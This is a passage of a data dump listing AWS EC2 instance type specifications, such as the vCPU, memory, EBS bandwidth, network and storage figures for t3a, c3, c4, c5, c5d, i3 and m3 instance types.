'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 350, 'BaselineThroughputInMBps': 43.75, 'BaselineIops': 2000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.medium', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 350, 'BaselineThroughputInMBps': 43.75, 'BaselineIops': 2000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 
'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 1024, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 90, 'BaselineThroughputInMBps': 11.25, 'BaselineIops': 500, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.micro', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 1024}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': 
{'BaselineBandwidthInMbps': 90, 'BaselineThroughputInMBps': 11.25, 'BaselineIops': 500, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 512, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 45, 'BaselineThroughputInMBps': 5.625, 'BaselineIops': 250, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.nano', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 
'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 512}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 45, 'BaselineThroughputInMBps': 5.625, 'BaselineIops': 250, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 2048, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 175, 'BaselineThroughputInMBps': 21.875, 'BaselineIops': 1000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 
'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.small', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 175, 'BaselineThroughputInMBps': 21.875, 'BaselineIops': 1000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 
'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 7680, 'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 
'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 7680, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 750, 'BaselineThroughputInMBps': 93.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 750, 'MaximumThroughputInMBps': 93.75, 'MaximumIops': 6000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 
'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 750, 'BaselineThroughputInMBps': 93.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 750, 'MaximumThroughputInMBps': 93.75, 'MaximumIops': 6000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 
'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 
'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'TotalSizeInGB': 100, 'Disks': [{'SizeInGB': 100, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 100, 'Disks': [{'SizeInGB': 100, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 
'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 31232, 'TotalSizeInGB': 950, 'Disks': [{'SizeInGB': 950, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 850, 'BaselineThroughputInMBps': 106.25, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 850, 'MaximumThroughputInMBps': 106.25, 'MaximumIops': 6000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': 
{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 31232}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 950, 'Disks': [{'SizeInGB': 950, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 850, 'BaselineThroughputInMBps': 106.25, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 850, 'MaximumThroughputInMBps': 106.25, 'MaximumIops': 6000}, 'NvmeSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1], 'SizeInMiB': 15360, 'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 
'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'm3.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': 
